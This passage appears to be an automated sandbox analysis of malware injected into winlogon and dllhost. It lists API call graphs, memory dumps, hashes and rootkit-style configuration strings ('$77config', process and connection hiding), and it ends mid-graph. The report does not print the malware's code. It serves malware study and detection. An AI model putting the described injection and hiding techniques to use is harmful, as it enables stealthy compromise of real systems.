                                                                                                                                  • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                  • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                                                                                                  • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                  • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

Execution Graph

Execution Coverage: 1.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 127
Total number of Limit Nodes: 14

execution_graph (one basic block per line: node id, address, API calls made in the block, followed by the edges listed with it; "N API calls" summarises a callee)
14383 2e991755a4d
14384 2e991755a54 14383->14384
14385 2e991755abb 14384->14385
14386 2e991755b37 VirtualProtect 14384->14386
14387 2e991755b71 14386->14387
14388 2e991755b63 GetLastError 14386->14388 14388->14387
14389 2e99175f130 VirtualProtect
14390 2e991751bc0
14397 2e991751724 GetProcessHeap HeapAlloc 14390->14397
14392 2e991751bcf
14393 2e991751bd6 SleepEx 14392->14393
14396 2e99175159c StrCmpIW StrCmpW 14392->14396
14448 2e9917519b0 14392->14448
14394 2e991751724 50 API calls 14393->14394 14394->14392 14396->14392
14465 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14397->14465
14399 2e99175174c
14466 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14399->14466
14401 2e991751754
14467 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14401->14467
14403 2e99175175d
14468 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14403->14468
14405 2e991751766
14469 2e991751264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14405->14469
14407 2e99175176f
14470 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14407->14470
14409 2e991751778
14471 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14409->14471
14411 2e991751781
14472 2e991751000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14411->14472
14413 2e99175178a RegOpenKeyExW
14414 2e9917517bc RegOpenKeyExW 14413->14414
14415 2e9917519a2 14413->14415
14416 2e9917517fb RegOpenKeyExW 14414->14416
14417 2e9917517e5 14414->14417 14415->14392
14418 2e99175181f 14416->14418
14419 2e991751836 RegOpenKeyExW 14416->14419
14479 2e9917512b8 RegQueryInfoKeyW 14417->14479
14473 2e99175104c RegQueryInfoKeyW 14418->14473
14422 2e99175185a 14419->14422
14423 2e991751871 RegOpenKeyExW 14419->14423
14426 2e9917512b8 16 API calls 14422->14426
14427 2e9917518ac RegOpenKeyExW 14423->14427
14428 2e991751895 14423->14428
14429 2e991751867 RegCloseKey 14426->14429
14431 2e9917518d0 14427->14431
14432 2e9917518e7 RegOpenKeyExW 14427->14432
14430 2e9917512b8 16 API calls 14428->14430 14429->14423
14435 2e9917518a2 RegCloseKey 14430->14435
14436 2e9917512b8 16 API calls 14431->14436
14433 2e99175190b 14432->14433
14434 2e991751922 RegOpenKeyExW 14432->14434
14437 2e99175104c 6 API calls 14433->14437
14438 2e99175195d RegOpenKeyExW 14434->14438
14439 2e991751946 14434->14439 14435->14427
14440 2e9917518dd RegCloseKey 14436->14440
14441 2e991751918 RegCloseKey 14437->14441
14443 2e991751998 RegCloseKey 14438->14443
14444 2e991751981 14438->14444
14442 2e99175104c 6 API calls 14439->14442 14440->14432 14441->14434
14445 2e991751953 RegCloseKey 14442->14445 14443->14415
14446 2e99175104c 6 API calls 14444->14446 14445->14438
14447 2e99175198e RegCloseKey 14446->14447 14447->14443
14493 2e9917514a0 14448->14493 14465->14399 14466->14401 14467->14403 14468->14405 14469->14407 14470->14409 14471->14411 14472->14413
14474 2e9917510bf 14473->14474
14475 2e9917511b5 RegCloseKey 14473->14475 14474->14475
14476 2e9917510cf RegEnumValueW 14474->14476 14475->14419
14477 2e991751125 14476->14477 14477->14475 14477->14476
14478 2e99175114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14477->14478 14478->14477
14480 2e991751486 RegCloseKey 14479->14480
14481 2e991751323 GetProcessHeap HeapAlloc 14479->14481 14480->14416
14482 2e99175134e RegEnumValueW 14481->14482
14483 2e991751472 GetProcessHeap HeapFree 14481->14483
14484 2e9917513a1 14482->14484 14483->14480 14484->14482 14484->14483
14486 2e9917513cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14484->14486
14487 2e99175141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 14484->14487
14488 2e991751530 14484->14488 14486->14487 14487->14484
14489 2e991751580 14488->14489
14490 2e99175154a 14488->14490 14489->14484 14490->14489
14491 2e991751569 StrCmpW 14490->14491
14492 2e991751561 StrCmpIW 14490->14492 14491->14490 14492->14490
14494 2e9917514e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 14493->14494
14495 2e9917514c2 GetProcessHeap HeapFree 14493->14495 14495->14494 14495->14495
14496 2e9917561f0
14497 2e9917561fd 14496->14497
14498 2e991756209 14497->14498
14505 2e99175631a 14497->14505
14499 2e99175623e 14498->14499
14503 2e99175628d 14498->14503
14500 2e991756266 SetThreadContext 14499->14500 14500->14503
14501 2e9917563fe
14504 2e99175641e 14501->14504
14518 2e9917548e0 14501->14518
14502 2e991756341 VirtualProtect FlushInstructionCache 14502->14505
14514 2e9917552f0 GetCurrentProcess 14504->14514 14505->14501 14505->14502
14508 2e991756423
14509 2e991756477 14508->14509
14510 2e991756437 ResumeThread 14508->14510
14522 2e991757e30 14509->14522
14511 2e99175646b 14510->14511 14511->14508
14515 2e99175530c 14514->14515
14516 2e991755322 VirtualProtect FlushInstructionCache 14515->14516
14517 2e991755353 14515->14517 14516->14515 14517->14508
14520 2e9917548fc 14518->14520
14519 2e99175495f 14519->14504 14520->14519
14521 2e991754912 VirtualFree 14520->14521 14521->14520
14523 2e991757e39 14522->14523
14524 2e9917564bf 14523->14524
14525 2e991758608 IsProcessorFeaturePresent 14523->14525
14526 2e991758620 14525->14526
14531 2e9917586dc RtlCaptureContext 14526->14531
14532 2e9917586f6 RtlLookupFunctionEntry 14531->14532
14533 2e99175870c RtlVirtualUnwind 14532->14533
14534 2e991758633 14532->14534 14533->14532 14533->14534
14535 2e9917585d4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14534->14535
14536 2e991753fb9
14539 2e991753f06 _invalid_parameter_noinfo 14536->14539
14537 2e991753f70
14538 2e991753f56 VirtualQuery 14538->14537 14538->14539 14539->14537 14539->14538
14540 2e991753f8a VirtualAlloc 14539->14540 14540->14537
14541 2e991753fbb GetLastError 14540->14541 14541->14537 14541->14539
14542 2e991752b6c NtEnumerateValueKey
14543 2e991752c14 14542->14543
14545 2e991752bb8 14542->14545
14544 2e991752bc6 NtEnumerateValueKey 14544->14545 14545->14543 14545->14544
14547 2e991753d4c 14545->14547
14548 2e991753d59 StrCmpNIW 14547->14548
14549 2e991753d6e 14547->14549 14548->14549 14549->14545

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: EnumerateValue
• String ID:
• API String ID: 1749906896-0
• Opcode ID: cce93084de4f1c13faca434b1b58a320d42ce6f8b5b46e4938d1791c75797ad0
• Instruction ID: bb0b746c7d7e8e1c1c3dc8ea7404da3bf1fab72ceb8828c67ca5494de085e915
• Opcode Fuzzy Hash: cce93084de4f1c13faca434b1b58a320d42ce6f8b5b46e4938d1791c75797ad0
• Instruction Fuzzy Hash: CB219D3270478286E3248F17E84462AB7A4F784F90F52401ADE9643756EF34D8C2CB10

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 2135414181-649645306
• Opcode ID: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
• Instruction ID: 9cecd22dc93b93da146973eae8eaed19efab71e352ccd1da79b14e235d8f31d8
• Opcode Fuzzy Hash: 450dbbf1704afe51d16eaedd2f846ad832dc3a6968aef11f1843edb122fe1598
• Instruction Fuzzy Hash: B1713C36350A9285EB109F77E85869933B4FB88BC9F42111BDE4E97B2ADF34C484DB50

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
• String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
• API String ID: 740688525-1880043860
• Opcode ID: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
• Instruction ID: b0209ebd61e2fab8511d4edb2354d5e0ab5c113fe7e541c4a772a81c8cdb100f
• Opcode Fuzzy Hash: 89f5c5e66e1b755f5237e9f7541e1364ddeb157113d91c30ac669978387284b4
• Instruction Fuzzy Hash: A351E42175178691FA159B67E8083996390BB48BF0F4A072EDE3D477C2DF38C4C59B61

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
• Instruction ID: e1cd0f3384c7bd7116e6fab5b716cc361b72aa22bfdca43cb9415272024f5181
• Opcode Fuzzy Hash: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
• Instruction Fuzzy Hash: 29115E2634478282EB549B22E40C2696261FB48BD4F06042ADE8D477A5EF3DC989CB24

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: f9c7edb839f8afab2ab00d4806129f23657d59249b786f986b6d92e07e061a8b
• Instruction ID: a942265f263d1c6aa3c7b2db314f1e2570fec8393292db9b88e5502b485481de
• Opcode Fuzzy Hash: f9c7edb839f8afab2ab00d4806129f23657d59249b786f986b6d92e07e061a8b
• Instruction Fuzzy Hash: 04D18976248B8982DA709B16E49835AB7B0F3C8B88F51411BEACD477A6DF3CC591CF50

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
• Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 594dc9face250f325cdd0050e7745ffef46564ac88561e200211c92668648e15
• Instruction ID: fd77efcf454a593052a900f5d24deb063e8333f21706fb0596c236d1f298a2bf
• Opcode Fuzzy Hash: 594dc9face250f325cdd0050e7745ffef46564ac88561e200211c92668648e15
• Instruction Fuzzy Hash: E002CC36259BC586DBA0CB56F49835AB7A0F3C5794F11011AEA8E87BA9DF7CC484CF10
APIs
Memory Dump Source
• Source File: 00000007.00000003.1460673433.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_3_2e991720000_winlogon.jbxd
Similarity
• API ID: Virtual$Protect$AllocLibraryLoad
• String ID:
• API String ID: 3316853933-0
• Opcode ID: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
• Instruction ID: 86b18cc00f20ad3ba2a97ca244dab453444bddccd4bdbebc55ac331b23cb3e81
• Opcode Fuzzy Hash: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
• Instruction Fuzzy Hash: ED915B73B421D287DB64CF26D008B6DB391F744B94F56892ADF4917B89DA34D893CB20

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual$AllocQuery
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 31662377-0
                                                                                                                                  • Opcode ID: 5ba12f6accd07a0eb55bf7dfd9b871ad288432e16da66455f45f403d1a1142ff
                                                                                                                                  • Instruction ID: 8ba598d568ffd65190b76ab362553a4096fa87b101414cdd4facefb4bec00a18
                                                                                                                                  • Opcode Fuzzy Hash: 5ba12f6accd07a0eb55bf7dfd9b871ad288432e16da66455f45f403d1a1142ff
                                                                                                                                  • Instruction Fuzzy Hash: D7313222359AC681EB719B16E05835A66B4F388784F51052AF5CE46BEADF3CC5C18F34

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 000002E991753805
                                                                                                                                  • PathFindFileNameW.SHLWAPI ref: 000002E991753814
                                                                                                                                    • Part of subcall function 000002E991753D4C: StrCmpNIW.SHLWAPI(?,?,?,000002E991752722), ref: 000002E991753D64
                                                                                                                                    • Part of subcall function 000002E991753C98: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002E99175382B), ref: 000002E991753CA6
                                                                                                                                    • Part of subcall function 000002E991753C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E99175382B), ref: 000002E991753CD4
                                                                                                                                    • Part of subcall function 000002E991753C98: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E99175382B), ref: 000002E991753CF6
                                                                                                                                    • Part of subcall function 000002E991753C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002E99175382B), ref: 000002E991753D11
                                                                                                                                    • Part of subcall function 000002E991753C98: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002E99175382B), ref: 000002E991753D32
                                                                                                                                  • CreateThread.KERNELBASE ref: 000002E99175385B
                                                                                                                                    • Part of subcall function 000002E991751E38: GetCurrentThread.KERNEL32 ref: 000002E991751E43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1683269324-0
                                                                                                                                  • Opcode ID: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction ID: 74bbdc8d9ef711710cfb580921230ed5c503e86a188a60ebfc3e87c1c649e38b
                                                                                                                                  • Opcode Fuzzy Hash: 8fe4187ffbe2e325f874313ed1639ea6f9221a9ff2286d6fb21bcd5417110a44
                                                                                                                                  • Instruction Fuzzy Hash: 13115A30BD47C382FB68A767E40D36922A5BB547CAF82412F9446821E3EF79D0D48E31

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3733156554-0
                                                                                                                                  • Opcode ID: 138b8d06eba3c29c82db8ae31000ece8896a83a50fcfc52d630737eb27e5b0b5
                                                                                                                                  • Instruction ID: 59934aa14fbed775615614275cbadd493e30fbcbc3f9d3bb623e69e1c6b8d28f
                                                                                                                                  • Opcode Fuzzy Hash: 138b8d06eba3c29c82db8ae31000ece8896a83a50fcfc52d630737eb27e5b0b5
                                                                                                                                  • Instruction Fuzzy Hash: AAF03066268B8580D630DB02F45834AA7A0F3887D8F55011BFACD03B6BCB78C6C08F60

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 000002E991751724: GetProcessHeap.KERNEL32 ref: 000002E99175172F
                                                                                                                                    • Part of subcall function 000002E991751724: HeapAlloc.KERNEL32 ref: 000002E99175173E
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917517AE
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917517DB
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917517F5
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751815
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.KERNELBASE ref: 000002E991751830
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751850
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E99175186B
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E99175188B
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917518A6
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E9917518C6
                                                                                                                                  • SleepEx.KERNELBASE ref: 000002E991751BDB
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E9917518E1
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751901
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E99175191C
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E99175193C
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E991751957
                                                                                                                                    • Part of subcall function 000002E991751724: RegOpenKeyExW.KERNELBASE ref: 000002E991751977
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.ADVAPI32 ref: 000002E991751992
                                                                                                                                    • Part of subcall function 000002E991751724: RegCloseKey.KERNELBASE ref: 000002E99175199C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 948135145-0
                                                                                                                                  • Opcode ID: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction ID: e376f86ea4916966ac153127ec5cec751f2e67e269a9de7d95168439c608e474
                                                                                                                                  • Opcode Fuzzy Hash: 90453a0d966f37a875fa9fa31a0a9dc9a62d0711adb439b1f5817520d04ee1bf
                                                                                                                                  • Instruction Fuzzy Hash: 5331FC653806C342FB509B27D65936913A4FB44BC1F1A542B9E0B87697EF35D8D08B31

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 354 2e99175f130-2e99175f15f VirtualProtect
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000007.00000002.2779900930.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true
                                                                                                                                  • Associated: 00000007.00000002.2778881984.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2781120272.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2782284608.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2783213596.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000007.00000002.2784216472.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_7_2_2e991750000_winlogon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                  • Opcode ID: d03a29792b6748d9f8b50c36da3d412cbb8c174d26c0222ae433d454c6783b33
                                                                                                                                  • Instruction ID: 13e7b84320865d9b31e569f8acddc3596c4c77e6deba9caaafb55c679f67a583
                                                                                                                                  • Opcode Fuzzy Hash: d03a29792b6748d9f8b50c36da3d412cbb8c174d26c0222ae433d454c6783b33
                                                                                                                                  • Instruction Fuzzy Hash: BFD01225735581C3E300DB22D8497956368F398741FC1400AE949C2695CF7CC299CF61

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 403 2e991752dd0-2e991752e49 405 2e991752e4f-2e991752e55 403->405 406 2e991753154-2e991753177 403->406 405->406 407 2e991752e5b-2e991752e5e 405->407 407->406 408 2e991752e64-2e991752e67 407->408 408->406 409 2e991752e6d-2e991752e7d GetModuleHandleA 408->409 410 2e991752e7f-2e991752e8f GetProcAddress 409->410 411 2e991752e91 409->411 412 2e991752e94-2e991752eb2 410->412 411->412 412->406 414 2e991752eb8-2e991752ed7 StrCmpNIW 412->414 414->406 415 2e991752edd-2e991752ee1 414->415 415->406 416 2e991752ee7-2e991752ef1 415->416 416->406 417 2e991752ef7-2e991752efe 416->417 417->406 418 2e991752f04-2e991752f17 417->418 419 2e991752f19-2e991752f25 418->419 420 2e991752f27 418->420 421 2e991752f2a-2e991752f2e 419->421 420->421 422 2e991752f3e 421->422 423 2e991752f30-2e991752f3c 421->423 424 2e991752f41-2e991752f4b 422->424 423->424 425 2e991753031-2e991753035 424->425 426 2e991752f51-2e991752f54 424->426 427 2e99175303b-2e99175303e 425->427 428 2e991753146-2e99175314e 425->428 429 2e991752f66-2e991752f70 426->429 430 2e991752f56-2e991752f63 call 2e991751a30 426->430 431 2e991753040-2e99175304c call 2e991751a30 427->431 432 2e99175304f-2e991753059 427->432 428->406 428->418 434 2e991752f72-2e991752f7f 429->434 435 2e991752fa4-2e991752fae 429->435 430->429 431->432 440 2e991753089-2e99175308c 432->440 441 2e99175305b-2e991753068 432->441 434->435 436 2e991752f81-2e991752f8e 434->436 437 2e991752fde-2e991752fe1 435->437 438 2e991752fb0-2e991752fbd 435->438 443 2e991752f91-2e991752f97 436->443 446 2e991752fef-2e991752ffc lstrlenW 437->446 447 2e991752fe3-2e991752fed call 2e991751cc0 437->447 438->437 444 2e991752fbf-2e991752fcc 438->444 449 2e99175308e-2e991753097 call 